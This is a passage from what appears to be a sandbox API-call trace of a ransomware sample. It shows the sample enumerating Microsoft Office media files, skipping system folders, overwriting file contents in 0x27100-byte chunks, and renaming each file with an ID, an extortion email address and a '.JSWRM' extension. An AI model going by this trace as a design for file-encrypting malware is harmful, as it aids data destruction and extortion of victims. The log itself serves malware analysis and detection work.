(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0135.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringback.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringback.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.501] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=720044) returned 1 [0135.501] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.501] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.532] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.532] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.533] CloseHandle (hObject=0x238) returned 1 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0135.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0135.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0135.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0135.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0135.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.581] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringback.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringback.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringback.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringback.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0135.584] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b11fc05, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b11fc05, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b145e25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xafcac, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringing.wav", cAlternateFileName="LYNC_R~4.WAV")) returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2=".") returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="..") returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="...") returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="windows") returned -1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="recovery") returned -1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="perflogs") returned -1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="documents and settings") returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="system volume information") returned -1 [0135.584] lstrcmpiW (lpString1="LYNC_ringing.wav", lpString2="msocache") returned -1 [0135.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringing.wav", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0135.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0135.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringing.wav", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringing.wav", lpUsedDefaultChar=0x0) returned 16 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringing.wav", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0135.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0135.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringing.wav", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringing.wav", lpUsedDefaultChar=0x0) returned 16 [0135.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0135.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0135.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0135.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringing.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringing.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.586] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=720044) returned 1 [0135.586] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.586] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.599] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.599] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.600] CloseHandle (hObject=0x238) returned 1 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0135.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0135.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0135.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0135.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0135.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringing.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringing.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringing.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringing.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0135.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0135.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0135.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0135.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0135.601] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b16c081, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x178000, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone2.wav", cAlternateFileName="LYNC_R~3.WAV")) returned 1 [0135.601] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2=".") returned 1 [0135.601] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="..") returned 1 [0135.601] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="...") returned 1 [0135.601] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="windows") returned -1 [0135.601] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="recovery") returned -1 [0135.602] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="perflogs") returned -1 [0135.602] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="documents and settings") returned 1 [0135.602] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.602] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="system volume information") returned -1 [0135.602] lstrcmpiW (lpString1="LYNC_ringtone2.wav", lpString2="msocache") returned -1 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone2.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone2.wav", cchWideChar=18, lpMultiByteStr=0x2412b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone2.wav", lpUsedDefaultChar=0x0) returned 18 [0135.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone2.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone2.wav", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone2.wav", lpUsedDefaultChar=0x0) returned 18 [0135.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0135.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0135.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone2.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.603] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1540096) returned 1 [0135.603] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.603] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.616] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.616] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.617] CloseHandle (hObject=0x238) returned 1 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0135.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0135.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0135.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0135.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0135.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0135.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0135.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone2.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone2.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone2.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone2.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0135.619] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b145e25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b145e25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b145e25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa5100, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone3.wav", cAlternateFileName="LYE797~1.WAV")) returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2=".") returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="..") returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="...") returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="windows") returned -1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="recovery") returned -1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="perflogs") returned -1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="documents and settings") returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="system volume information") returned -1 [0135.619] lstrcmpiW (lpString1="LYNC_ringtone3.wav", lpString2="msocache") returned -1 [0135.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone3.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0135.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone3.wav", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone3.wav", lpUsedDefaultChar=0x0) returned 18 [0135.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone3.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0135.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone3.wav", cchWideChar=18, lpMultiByteStr=0x2411f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone3.wav", lpUsedDefaultChar=0x0) returned 18 [0135.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0135.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0135.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 